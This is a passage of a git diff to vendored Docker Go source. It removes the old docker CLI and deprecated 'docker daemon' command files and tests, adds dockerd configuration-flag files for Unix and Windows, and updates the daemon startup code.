newDaemonCommand() *cobra.Command { - return &cobra.Command{ - Use: "daemon", - Hidden: true, - RunE: func(cmd *cobra.Command, args []string) error { - return runDaemon() - }, - } -} - -func runDaemon() error { - return fmt.Errorf( - "`docker daemon` is not supported on %s. 
Please run `dockerd` directly", - strings.Title(runtime.GOOS)) -} diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go b/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go deleted file mode 100644 index 32032fe1b3..0000000000 --- a/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go +++ /dev/null @@ -1,17 +0,0 @@ -// +build !daemon - -package main - -import ( - "testing" - - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestDaemonCommand(t *testing.T) { - cmd := newDaemonCommand() - cmd.SetArgs([]string{"--help"}) - err := cmd.Execute() - - assert.Error(t, err, "Please run `dockerd`") -} diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go b/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go deleted file mode 100644 index 26348a8843..0000000000 --- a/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go +++ /dev/null @@ -1,30 +0,0 @@ -// +build daemon - -package main - -import ( - "testing" - - "github.com/docker/docker/pkg/testutil/assert" - "github.com/spf13/cobra" -) - -func stubRun(cmd *cobra.Command, args []string) error { - return nil -} - -func TestDaemonCommandHelp(t *testing.T) { - cmd := newDaemonCommand() - cmd.RunE = stubRun - cmd.SetArgs([]string{"--help"}) - err := cmd.Execute() - assert.NilError(t, err) -} - -func TestDaemonCommand(t *testing.T) { - cmd := newDaemonCommand() - cmd.RunE = stubRun - cmd.SetArgs([]string{"--containerd", "/foo"}) - err := cmd.Execute() - assert.NilError(t, err) -} diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go b/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go deleted file mode 100644 index f68d220c2f..0000000000 --- a/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go +++ /dev/null @@ -1,79 +0,0 @@ -// +build daemon - -package main - -import ( - "fmt" - - "os" - "os/exec" - "path/filepath" - "syscall" - - "github.com/spf13/cobra" -) - -const daemonBinary = "dockerd" - -func 
newDaemonCommand() *cobra.Command { - cmd := &cobra.Command{ - Use: "daemon", - Hidden: true, - Args: cobra.ArbitraryArgs, - DisableFlagParsing: true, - RunE: func(cmd *cobra.Command, args []string) error { - return runDaemon() - }, - Deprecated: "and will be removed in Docker 1.16. Please run `dockerd` directly.", - } - cmd.SetHelpFunc(helpFunc) - return cmd -} - -// CmdDaemon execs dockerd with the same flags -func runDaemon() error { - // Use os.Args[1:] so that "global" args are passed to dockerd - return execDaemon(stripDaemonArg(os.Args[1:])) -} - -func execDaemon(args []string) error { - binaryPath, err := findDaemonBinary() - if err != nil { - return err - } - - return syscall.Exec( - binaryPath, - append([]string{daemonBinary}, args...), - os.Environ()) -} - -func helpFunc(cmd *cobra.Command, args []string) { - if err := execDaemon([]string{"--help"}); err != nil { - fmt.Fprintf(os.Stderr, "%s\n", err.Error()) - } -} - -// findDaemonBinary looks for the path to the dockerd binary starting with -// the directory of the current executable (if one exists) and followed by $PATH -func findDaemonBinary() (string, error) { - execDirname := filepath.Dir(os.Args[0]) - if execDirname != "" { - binaryPath := filepath.Join(execDirname, daemonBinary) - if _, err := os.Stat(binaryPath); err == nil { - return binaryPath, nil - } - } - - return exec.LookPath(daemonBinary) -} - -// stripDaemonArg removes the `daemon` argument from the list -func stripDaemonArg(args []string) []string { - for i, arg := range args { - if arg == "daemon" { - return append(args[:i], args[i+1:]...) 
- } - } - return args -} diff --git a/vendor/github.com/docker/docker/cmd/docker/docker.go b/vendor/github.com/docker/docker/cmd/docker/docker.go deleted file mode 100644 index d4847a90ee..0000000000 --- a/vendor/github.com/docker/docker/cmd/docker/docker.go +++ /dev/null @@ -1,180 +0,0 @@ -package main - -import ( - "errors" - "fmt" - "os" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types/versions" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/commands" - cliflags "github.com/docker/docker/cli/flags" - "github.com/docker/docker/cliconfig" - "github.com/docker/docker/dockerversion" - "github.com/docker/docker/pkg/term" - "github.com/docker/docker/utils" - "github.com/spf13/cobra" - "github.com/spf13/pflag" -) - -func newDockerCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := cliflags.NewClientOptions() - var flags *pflag.FlagSet - - cmd := &cobra.Command{ - Use: "docker [OPTIONS] COMMAND [ARG...]", - Short: "A self-sufficient runtime for containers", - SilenceUsage: true, - SilenceErrors: true, - TraverseChildren: true, - Args: noArgs, - RunE: func(cmd *cobra.Command, args []string) error { - if opts.Version { - showVersion() - return nil - } - return dockerCli.ShowHelp(cmd, args) - }, - PersistentPreRunE: func(cmd *cobra.Command, args []string) error { - // daemon command is special, we redirect directly to another binary - if cmd.Name() == "daemon" { - return nil - } - // flags must be the top-level command flags, not cmd.Flags() - opts.Common.SetDefaultOptions(flags) - dockerPreRun(opts) - if err := dockerCli.Initialize(opts); err != nil { - return err - } - return isSupported(cmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental()) - }, - } - cli.SetupRootCommand(cmd) - - cmd.SetHelpFunc(func(ccmd *cobra.Command, args []string) { - if dockerCli.Client() == nil { // when using --help, PersistenPreRun is not called, so initialization is needed. 
- // flags must be the top-level command flags, not cmd.Flags() - opts.Common.SetDefaultOptions(flags) - dockerPreRun(opts) - dockerCli.Initialize(opts) - } - - if err := isSupported(ccmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental()); err != nil { - ccmd.Println(err) - return - } - - hideUnsupportedFeatures(ccmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental()) - - if err := ccmd.Help(); err != nil { - ccmd.Println(err) - } - }) - - flags = cmd.Flags() - flags.BoolVarP(&opts.Version, "version", "v", false, "Print version information and quit") - flags.StringVar(&opts.ConfigDir, "config", cliconfig.ConfigDir(), "Location of client config files") - opts.Common.InstallFlags(flags) - - cmd.SetOutput(dockerCli.Out()) - cmd.AddCommand(newDaemonCommand()) - commands.AddCommands(cmd, dockerCli) - - return cmd -} - -func noArgs(cmd *cobra.Command, args []string) error { - if len(args) == 0 { - return nil - } - return fmt.Errorf( - "docker: '%s' is not a docker command.\nSee 'docker --help'", args[0]) -} - -func main() { - // Set terminal emulation based on platform as required. 
- stdin, stdout, stderr := term.StdStreams() - logrus.SetOutput(stderr) - - dockerCli := command.NewDockerCli(stdin, stdout, stderr) - cmd := newDockerCommand(dockerCli) - - if err := cmd.Execute(); err != nil { - if sterr, ok := err.(cli.StatusError); ok { - if sterr.Status != "" { - fmt.Fprintln(stderr, sterr.Status) - } - // StatusError should only be used for errors, and all errors should - // have a non-zero exit status, so never exit with 0 - if sterr.StatusCode == 0 { - os.Exit(1) - } - os.Exit(sterr.StatusCode) - } - fmt.Fprintln(stderr, err) - os.Exit(1) - } -} - -func showVersion() { - fmt.Printf("Docker version %s, build %s\n", dockerversion.Version, dockerversion.GitCommit) -} - -func dockerPreRun(opts *cliflags.ClientOptions) { - cliflags.SetLogLevel(opts.Common.LogLevel) - - if opts.ConfigDir != "" { - cliconfig.SetConfigDir(opts.ConfigDir) - } - - if opts.Common.Debug { - utils.EnableDebug() - } -} - -func hideUnsupportedFeatures(cmd *cobra.Command, clientVersion string, hasExperimental bool) { - cmd.Flags().VisitAll(func(f *pflag.Flag) { - // hide experimental flags - if !hasExperimental { - if _, ok := f.Annotations["experimental"]; ok { - f.Hidden = true - } - } - - // hide flags not supported by the server - if flagVersion, ok := f.Annotations["version"]; ok && len(flagVersion) == 1 && versions.LessThan(clientVersion, flagVersion[0]) { - f.Hidden = true - } - - }) - - for _, subcmd := range cmd.Commands() { - // hide experimental subcommands - if !hasExperimental { - if _, ok := subcmd.Tags["experimental"]; ok { - subcmd.Hidden = true - } - } - - // hide subcommands not supported by the server - if subcmdVersion, ok := subcmd.Tags["version"]; ok && versions.LessThan(clientVersion, subcmdVersion) { - subcmd.Hidden = true - } - } -} - -func isSupported(cmd *cobra.Command, clientVersion string, hasExperimental bool) error { - if !hasExperimental { - if _, ok := cmd.Tags["experimental"]; ok { - return errors.New("only supported with experimental 
daemon") - } - } - - if cmdVersion, ok := cmd.Tags["version"]; ok && versions.LessThan(clientVersion, cmdVersion) { - return fmt.Errorf("only supported with daemon version >= %s", cmdVersion) - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cmd/docker/docker_test.go b/vendor/github.com/docker/docker/cmd/docker/docker_test.go deleted file mode 100644 index 8738f6005d..0000000000 --- a/vendor/github.com/docker/docker/cmd/docker/docker_test.go +++ /dev/null @@ -1,32 +0,0 @@ -package main - -import ( - "io/ioutil" - "os" - "testing" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/testutil/assert" - "github.com/docker/docker/utils" -) - -func TestClientDebugEnabled(t *testing.T) { - defer utils.DisableDebug() - - cmd := newDockerCommand(&command.DockerCli{}) - cmd.Flags().Set("debug", "true") - - err := cmd.PersistentPreRunE(cmd, []string{}) - assert.NilError(t, err) - assert.Equal(t, os.Getenv("DEBUG"), "1") - assert.Equal(t, logrus.GetLevel(), logrus.DebugLevel) -} - -func TestExitStatusForInvalidSubcommandWithHelpFlag(t *testing.T) { - discard := ioutil.Discard - cmd := newDockerCommand(command.NewDockerCli(os.Stdin, discard, discard)) - cmd.SetArgs([]string{"help", "invalid"}) - err := cmd.Execute() - assert.Error(t, err, "unknown help topic: invalid") -} diff --git a/vendor/github.com/docker/docker/cmd/docker/docker_windows.go b/vendor/github.com/docker/docker/cmd/docker/docker_windows.go deleted file mode 100644 index 9bc507e20c..0000000000 --- a/vendor/github.com/docker/docker/cmd/docker/docker_windows.go +++ /dev/null @@ -1,18 +0,0 @@ -package main - -import ( - "sync/atomic" - - _ "github.com/docker/docker/autogen/winresources/docker" -) - -//go:cgo_import_dynamic main.dummy CommandLineToArgvW%2 "shell32.dll" - -var dummy uintptr - -func init() { - // Ensure that this import is not removed by the linker. 
This is used to - // ensure that shell32.dll is loaded by the system loader, preventing - // go#15286 from triggering on Nano Server TP5. - atomic.LoadUintptr(&dummy) -} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config.go b/vendor/github.com/docker/docker/cmd/dockerd/config.go new file mode 100644 index 0000000000..abdac9a7fb --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/config.go @@ -0,0 +1,99 @@ +package main + +import ( + "runtime" + + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/opts" + "github.com/docker/docker/registry" + "github.com/spf13/pflag" +) + +const ( + // defaultShutdownTimeout is the default shutdown timeout for the daemon + defaultShutdownTimeout = 15 + // defaultTrustKeyFile is the default filename for the trust key + defaultTrustKeyFile = "key.json" +) + +// installCommonConfigFlags adds flags to the pflag.FlagSet to configure the daemon +func installCommonConfigFlags(conf *config.Config, flags *pflag.FlagSet) { + var maxConcurrentDownloads, maxConcurrentUploads int + + installRegistryServiceFlags(&conf.ServiceOptions, flags) + + flags.Var(opts.NewNamedListOptsRef("storage-opts", &conf.GraphOptions, nil), "storage-opt", "Storage driver options") + flags.Var(opts.NewNamedListOptsRef("authorization-plugins", &conf.AuthorizationPlugins, nil), "authorization-plugin", "Authorization plugins to load") + flags.Var(opts.NewNamedListOptsRef("exec-opts", &conf.ExecOptions, nil), "exec-opt", "Runtime execution options") + flags.StringVarP(&conf.Pidfile, "pidfile", "p", defaultPidFile, "Path to use for daemon PID file") + flags.StringVarP(&conf.Root, "graph", "g", defaultDataRoot, "Root of the Docker runtime") + flags.StringVar(&conf.ExecRoot, "exec-root", defaultExecRoot, "Root directory for execution state files") + flags.StringVar(&conf.ContainerdAddr, "containerd", "", "containerd grpc address") + + // "--graph" is "soft-deprecated" in favor of "data-root". 
This flag was added + // before Docker 1.0, so won't be removed, only hidden, to discourage its usage. + flags.MarkHidden("graph") + + flags.StringVar(&conf.Root, "data-root", defaultDataRoot, "Root directory of persistent Docker state") + + flags.BoolVarP(&conf.AutoRestart, "restart", "r", true, "--restart on the daemon has been deprecated in favor of --restart policies on docker run") + flags.MarkDeprecated("restart", "Please use a restart policy on docker run") + + // Windows doesn't support setting the storage driver - there is no choice as to which ones to use. + if runtime.GOOS != "windows" { + flags.StringVarP(&conf.GraphDriver, "storage-driver", "s", "", "Storage driver to use") + } + + flags.IntVar(&conf.Mtu, "mtu", 0, "Set the containers network MTU") + flags.BoolVar(&conf.RawLogs, "raw-logs", false, "Full timestamps without ANSI coloring") + flags.Var(opts.NewListOptsRef(&conf.DNS, opts.ValidateIPAddress), "dns", "DNS server to use") + flags.Var(opts.NewNamedListOptsRef("dns-opts", &conf.DNSOptions, nil), "dns-opt", "DNS options to use") + flags.Var(opts.NewListOptsRef(&conf.DNSSearch, opts.ValidateDNSSearch), "dns-search", "DNS search domains to use") + flags.Var(opts.NewNamedListOptsRef("labels", &conf.Labels, opts.ValidateLabel), "label", "Set key=value labels to the daemon") + flags.StringVar(&conf.LogConfig.Type, "log-driver", "json-file", "Default driver for container logs") + flags.Var(opts.NewNamedMapOpts("log-opts", conf.LogConfig.Config, nil), "log-opt", "Default log driver options for containers") + flags.StringVar(&conf.ClusterAdvertise, "cluster-advertise", "", "Address or interface name to advertise") + flags.StringVar(&conf.ClusterStore, "cluster-store", "", "URL of the distributed storage backend") + flags.Var(opts.NewNamedMapOpts("cluster-store-opts", conf.ClusterOpts, nil), "cluster-store-opt", "Set cluster store options") + flags.StringVar(&conf.CorsHeaders, "api-cors-header", "", "Set CORS headers in the Engine API") + 
flags.IntVar(&maxConcurrentDownloads, "max-concurrent-downloads", config.DefaultMaxConcurrentDownloads, "Set the max concurrent downloads for each pull") + flags.IntVar(&maxConcurrentUploads, "max-concurrent-uploads", config.DefaultMaxConcurrentUploads, "Set the max concurrent uploads for each push") + flags.IntVar(&conf.ShutdownTimeout, "shutdown-timeout", defaultShutdownTimeout, "Set the default shutdown timeout") + flags.IntVar(&conf.NetworkDiagnosticPort, "network-diagnostic-port", 0, "TCP port number of the network diagnostic server") + flags.MarkHidden("network-diagnostic-port") + + flags.StringVar(&conf.SwarmDefaultAdvertiseAddr, "swarm-default-advertise-addr", "", "Set default address or interface for swarm advertised address") + flags.BoolVar(&conf.Experimental, "experimental", false, "Enable experimental features") + + flags.StringVar(&conf.MetricsAddress, "metrics-addr", "", "Set default address and port to serve the metrics api on") + + flags.Var(opts.NewNamedListOptsRef("node-generic-resources", &conf.NodeGenericResources, opts.ValidateSingleGenericResource), "node-generic-resource", "Advertise user-defined resource") + + flags.IntVar(&conf.NetworkControlPlaneMTU, "network-control-plane-mtu", config.DefaultNetworkMtu, "Network Control plane MTU") + + // "--deprecated-key-path" is to allow configuration of the key used + // for the daemon ID and the deprecated image signing. It was never + // exposed as a command line option but is added here to allow + // overriding the default path in configuration. 
+ flags.Var(opts.NewQuotedString(&conf.TrustKeyPath), "deprecated-key-path", "Path to key file for ID and image signing") + flags.MarkHidden("deprecated-key-path") + + conf.MaxConcurrentDownloads = &maxConcurrentDownloads + conf.MaxConcurrentUploads = &maxConcurrentUploads +} + +func installRegistryServiceFlags(options *registry.ServiceOptions, flags *pflag.FlagSet) { + ana := opts.NewNamedListOptsRef("allow-nondistributable-artifacts", &options.AllowNondistributableArtifacts, registry.ValidateIndexName) + mirrors := opts.NewNamedListOptsRef("registry-mirrors", &options.Mirrors, registry.ValidateMirror) + insecureRegistries := opts.NewNamedListOptsRef("insecure-registries", &options.InsecureRegistries, registry.ValidateIndexName) + + flags.Var(ana, "allow-nondistributable-artifacts", "Allow push of nondistributable artifacts to registry") + flags.Var(mirrors, "registry-mirror", "Preferred Docker registry mirror") + flags.Var(insecureRegistries, "insecure-registry", "Enable insecure registry communication") + + if runtime.GOOS != "windows" { + // TODO: Remove this flag after 3 release cycles (18.03) + flags.BoolVar(&options.V2Only, "disable-legacy-registry", true, "Disable contacting legacy registries") + flags.MarkHidden("disable-legacy-registry") + } +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config_common_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/config_common_unix.go new file mode 100644 index 0000000000..febf30ae9f --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/config_common_unix.go @@ -0,0 +1,34 @@ +// +build linux freebsd + +package main + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/opts" + "github.com/spf13/pflag" +) + +var ( + defaultPidFile = "/var/run/docker.pid" + defaultDataRoot = "/var/lib/docker" + defaultExecRoot = "/var/run/docker" +) + +// installUnixConfigFlags adds command-line options to the top-level flag parser for +// the 
current process that are common across Unix platforms. +func installUnixConfigFlags(conf *config.Config, flags *pflag.FlagSet) { + conf.Runtimes = make(map[string]types.Runtime) + + flags.StringVarP(&conf.SocketGroup, "group", "G", "docker", "Group for the unix socket") + flags.StringVar(&conf.BridgeConfig.IP, "bip", "", "Specify network bridge IP") + flags.StringVarP(&conf.BridgeConfig.Iface, "bridge", "b", "", "Attach containers to a network bridge") + flags.StringVar(&conf.BridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs") + flags.Var(opts.NewIPOpt(&conf.BridgeConfig.DefaultGatewayIPv4, ""), "default-gateway", "Container default gateway IPv4 address") + flags.Var(opts.NewIPOpt(&conf.BridgeConfig.DefaultGatewayIPv6, ""), "default-gateway-v6", "Container default gateway IPv6 address") + flags.BoolVar(&conf.BridgeConfig.InterContainerCommunication, "icc", true, "Enable inter-container communication") + flags.Var(opts.NewIPOpt(&conf.BridgeConfig.DefaultIP, "0.0.0.0"), "ip", "Default IP when binding container ports") + flags.Var(opts.NewNamedRuntimeOpt("runtimes", &conf.Runtimes, config.StockRuntimeName), "add-runtime", "Register an additional OCI compatible runtime") + flags.StringVar(&conf.DefaultRuntime, "default-runtime", config.StockRuntimeName, "Default OCI runtime for containers") + +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/config_unix.go new file mode 100644 index 0000000000..2dbd84b1db --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/config_unix.go @@ -0,0 +1,50 @@ +// +build linux freebsd + +package main + +import ( + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/opts" + "github.com/docker/go-units" + "github.com/spf13/pflag" +) + +// installConfigFlags adds flags to the pflag.FlagSet to configure the daemon +func installConfigFlags(conf *config.Config, flags *pflag.FlagSet) { + // First handle install flags which are 
consistent cross-platform + installCommonConfigFlags(conf, flags) + + // Then install flags common to unix platforms + installUnixConfigFlags(conf, flags) + + conf.Ulimits = make(map[string]*units.Ulimit) + conf.NetworkConfig.DefaultAddressPools = opts.PoolsOpt{} + + // Set default value for `--default-shm-size` + conf.ShmSize = opts.MemBytes(config.DefaultShmSize) + + // Then platform-specific install flags + flags.BoolVar(&conf.EnableSelinuxSupport, "selinux-enabled", false, "Enable selinux support") + flags.Var(opts.NewNamedUlimitOpt("default-ulimits", &conf.Ulimits), "default-ulimit", "Default ulimits for containers") + flags.BoolVar(&conf.BridgeConfig.EnableIPTables, "iptables", true, "Enable addition of iptables rules") + flags.BoolVar(&conf.BridgeConfig.EnableIPForward, "ip-forward", true, "Enable net.ipv4.ip_forward") + flags.BoolVar(&conf.BridgeConfig.EnableIPMasq, "ip-masq", true, "Enable IP masquerading") + flags.BoolVar(&conf.BridgeConfig.EnableIPv6, "ipv6", false, "Enable IPv6 networking") + flags.StringVar(&conf.BridgeConfig.FixedCIDRv6, "fixed-cidr-v6", "", "IPv6 subnet for fixed IPs") + flags.BoolVar(&conf.BridgeConfig.EnableUserlandProxy, "userland-proxy", true, "Use userland proxy for loopback traffic") + flags.StringVar(&conf.BridgeConfig.UserlandProxyPath, "userland-proxy-path", "", "Path to the userland proxy binary") + flags.StringVar(&conf.CgroupParent, "cgroup-parent", "", "Set parent cgroup for all containers") + flags.StringVar(&conf.RemappedRoot, "userns-remap", "", "User/Group setting for user namespaces") + flags.BoolVar(&conf.LiveRestoreEnabled, "live-restore", false, "Enable live restore of docker when containers are still running") + flags.IntVar(&conf.OOMScoreAdjust, "oom-score-adjust", -500, "Set the oom_score_adj for the daemon") + flags.BoolVar(&conf.Init, "init", false, "Run an init in the container to forward signals and reap processes") + flags.StringVar(&conf.InitPath, "init-path", "", "Path to the docker-init binary") + 
flags.Int64Var(&conf.CPURealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds") + flags.Int64Var(&conf.CPURealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds") + flags.StringVar(&conf.SeccompProfile, "seccomp-profile", "", "Path to seccomp profile") + flags.Var(&conf.ShmSize, "default-shm-size", "Default shm size for containers") + flags.BoolVar(&conf.NoNewPrivileges, "no-new-privileges", false, "Set no-new-privileges by default for new containers") + flags.StringVar(&conf.IpcMode, "default-ipc-mode", config.DefaultIpcMode, `Default mode for containers ipc ("shareable" | "private")`) + flags.Var(&conf.NetworkConfig.DefaultAddressPools, "default-address-pool", "Default address pools for node specific local networks") + +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config_unix_test.go b/vendor/github.com/docker/docker/cmd/dockerd/config_unix_test.go new file mode 100644 index 0000000000..d7dbf4b4cc --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/config_unix_test.go @@ -0,0 +1,23 @@ +// +build linux freebsd + +package main + +import ( + "testing" + + "github.com/docker/docker/daemon/config" + "github.com/spf13/pflag" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestDaemonParseShmSize(t *testing.T) { + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + conf := &config.Config{} + installConfigFlags(conf, flags) + // By default `--default-shm-size=64M` + assert.Check(t, is.Equal(int64(64*1024*1024), conf.ShmSize.Value())) + assert.Check(t, flags.Set("default-shm-size", "128M")) + assert.Check(t, is.Equal(int64(128*1024*1024), conf.ShmSize.Value())) +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/config_windows.go new file mode 100644 index 0000000000..36af76645f --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/config_windows.go @@ -0,0 +1,26 @@ +package main 
+ +import ( + "os" + "path/filepath" + + "github.com/docker/docker/daemon/config" + "github.com/spf13/pflag" +) + +var ( + defaultPidFile string + defaultDataRoot = filepath.Join(os.Getenv("programdata"), "docker") + defaultExecRoot = filepath.Join(os.Getenv("programdata"), "docker", "exec-root") +) + +// installConfigFlags adds flags to the pflag.FlagSet to configure the daemon +func installConfigFlags(conf *config.Config, flags *pflag.FlagSet) { + // First handle install flags which are consistent cross-platform + installCommonConfigFlags(conf, flags) + + // Then platform-specific install flags. + flags.StringVar(&conf.BridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs") + flags.StringVarP(&conf.BridgeConfig.Iface, "bridge", "b", "", "Attach containers to a virtual switch") + flags.StringVarP(&conf.SocketGroup, "group", "G", "", "Users or groups that can access the named pipe") +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon.go index 2f099e0199..efefaa1ac3 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon.go @@ -1,60 +1,63 @@ package main import ( + "context" "crypto/tls" "fmt" - "io" "os" "path/filepath" "runtime" "strings" "time" - "github.com/Sirupsen/logrus" "github.com/docker/distribution/uuid" "github.com/docker/docker/api" apiserver "github.com/docker/docker/api/server" + buildbackend "github.com/docker/docker/api/server/backend/build" "github.com/docker/docker/api/server/middleware" "github.com/docker/docker/api/server/router" "github.com/docker/docker/api/server/router/build" checkpointrouter "github.com/docker/docker/api/server/router/checkpoint" "github.com/docker/docker/api/server/router/container" + distributionrouter "github.com/docker/docker/api/server/router/distribution" "github.com/docker/docker/api/server/router/image" "github.com/docker/docker/api/server/router/network" 
pluginrouter "github.com/docker/docker/api/server/router/plugin" + sessionrouter "github.com/docker/docker/api/server/router/session" swarmrouter "github.com/docker/docker/api/server/router/swarm" systemrouter "github.com/docker/docker/api/server/router/system" "github.com/docker/docker/api/server/router/volume" + buildkit "github.com/docker/docker/builder/builder-next" "github.com/docker/docker/builder/dockerfile" - cliflags "github.com/docker/docker/cli/flags" - "github.com/docker/docker/cliconfig" + "github.com/docker/docker/builder/fscache" + "github.com/docker/docker/cli/debug" "github.com/docker/docker/daemon" "github.com/docker/docker/daemon/cluster" - "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/daemon/listeners" "github.com/docker/docker/dockerversion" "github.com/docker/docker/libcontainerd" dopts "github.com/docker/docker/opts" "github.com/docker/docker/pkg/authorization" - "github.com/docker/docker/pkg/jsonlog" - "github.com/docker/docker/pkg/listeners" + "github.com/docker/docker/pkg/jsonmessage" "github.com/docker/docker/pkg/pidfile" "github.com/docker/docker/pkg/plugingetter" "github.com/docker/docker/pkg/signal" "github.com/docker/docker/pkg/system" + "github.com/docker/docker/plugin" "github.com/docker/docker/registry" "github.com/docker/docker/runconfig" - "github.com/docker/docker/utils" "github.com/docker/go-connections/tlsconfig" + swarmapi "github.com/docker/swarmkit/api" + "github.com/moby/buildkit/session" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" "github.com/spf13/pflag" ) -const ( - flagDaemonConfigFile = "config-file" -) - // DaemonCli represents the daemon CLI. 
type DaemonCli struct { - *daemon.Config + *config.Config configFile *string flags *pflag.FlagSet @@ -68,60 +71,14 @@ func NewDaemonCli() *DaemonCli { return &DaemonCli{} } -func migrateKey(config *daemon.Config) (err error) { - // No migration necessary on Windows - if runtime.GOOS == "windows" { - return nil - } - - // Migrate trust key if exists at ~/.docker/key.json and owned by current user - oldPath := filepath.Join(cliconfig.ConfigDir(), cliflags.DefaultTrustKeyFile) - newPath := filepath.Join(getDaemonConfDir(config.Root), cliflags.DefaultTrustKeyFile) - if _, statErr := os.Stat(newPath); os.IsNotExist(statErr) && currentUserIsOwner(oldPath) { - defer func() { - // Ensure old path is removed if no error occurred - if err == nil { - err = os.Remove(oldPath) - } else { - logrus.Warnf("Key migration failed, key file not removed at %s", oldPath) - os.Remove(newPath) - } - }() - - if err := system.MkdirAll(getDaemonConfDir(config.Root), os.FileMode(0644)); err != nil { - return fmt.Errorf("Unable to create daemon configuration directory: %s", err) - } - - newFile, err := os.OpenFile(newPath, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0600) - if err != nil { - return fmt.Errorf("error creating key file %q: %s", newPath, err) - } - defer newFile.Close() - - oldFile, err := os.Open(oldPath) - if err != nil { - return fmt.Errorf("error opening key file %q: %s", oldPath, err) - } - defer oldFile.Close() - - if _, err := io.Copy(newFile, oldFile); err != nil { - return fmt.Errorf("error copying key: %s", err) - } - - logrus.Infof("Migrated key from %s to %s", oldPath, newPath) - } - - return nil -} - -func (cli *DaemonCli) start(opts daemonOptions) (err error) { +func (cli *DaemonCli) start(opts *daemonOptions) (err error) { stopc := make(chan bool) defer close(stopc) // warn from uuid package when running the daemon uuid.Loggerf = logrus.Warnf - opts.common.SetDefaultOptions(opts.flags) + opts.SetDefaultOptions(opts.flags) if cli.Config, err = loadDaemonCliConfig(opts); err 
!= nil { return err @@ -129,14 +86,8 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) { cli.configFile = &opts.configFile cli.flags = opts.flags - if opts.common.TrustKey == "" { - opts.common.TrustKey = filepath.Join( - getDaemonConfDir(cli.Config.Root), - cliflags.DefaultTrustKeyFile) - } - if cli.Config.Debug { - utils.EnableDebug() + debug.Enable() } if cli.Config.Experimental { @@ -144,20 +95,17 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) { } logrus.SetFormatter(&logrus.TextFormatter{ - TimestampFormat: jsonlog.RFC3339NanoFixed, + TimestampFormat: jsonmessage.RFC3339NanoFixed, DisableColors: cli.Config.RawLogs, + FullTimestamp: true, }) + system.InitLCOW(cli.Config.Experimental) + if err := setDefaultUmask(); err != nil { return fmt.Errorf("Failed to set umask: %v", err) } - if len(cli.LogConfig.Config) > 0 { - if err := logger.ValidateLogOpts(cli.LogConfig.Type, cli.LogConfig.Config); err != nil { - return fmt.Errorf("Failed to set log opts: %v", err) - } - } - // Create the daemon root before we create ANY other files (PID, or migrate keys) // to ensure the appropriate ACL is set (particularly relevant on Windows) if err := daemon.CreateDaemonRoot(cli.Config); err != nil { @@ -176,95 +124,57 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) { }() } - serverConfig := &apiserver.Config{ - Logging: true, - SocketGroup: cli.Config.SocketGroup, - Version: dockerversion.Version, - EnableCors: cli.Config.EnableCors, - CorsHeaders: cli.Config.CorsHeaders, - } - - if cli.Config.TLS { - tlsOptions := tlsconfig.Options{ - CAFile: cli.Config.CommonTLSOptions.CAFile, - CertFile: cli.Config.CommonTLSOptions.CertFile, - KeyFile: cli.Config.CommonTLSOptions.KeyFile, - } - - if cli.Config.TLSVerify { - // server requires and verifies client's certificate - tlsOptions.ClientAuth = tls.RequireAndVerifyClientCert - } - tlsConfig, err := tlsconfig.Server(tlsOptions) - if err != nil { - return err - } - serverConfig.TLSConfig = 
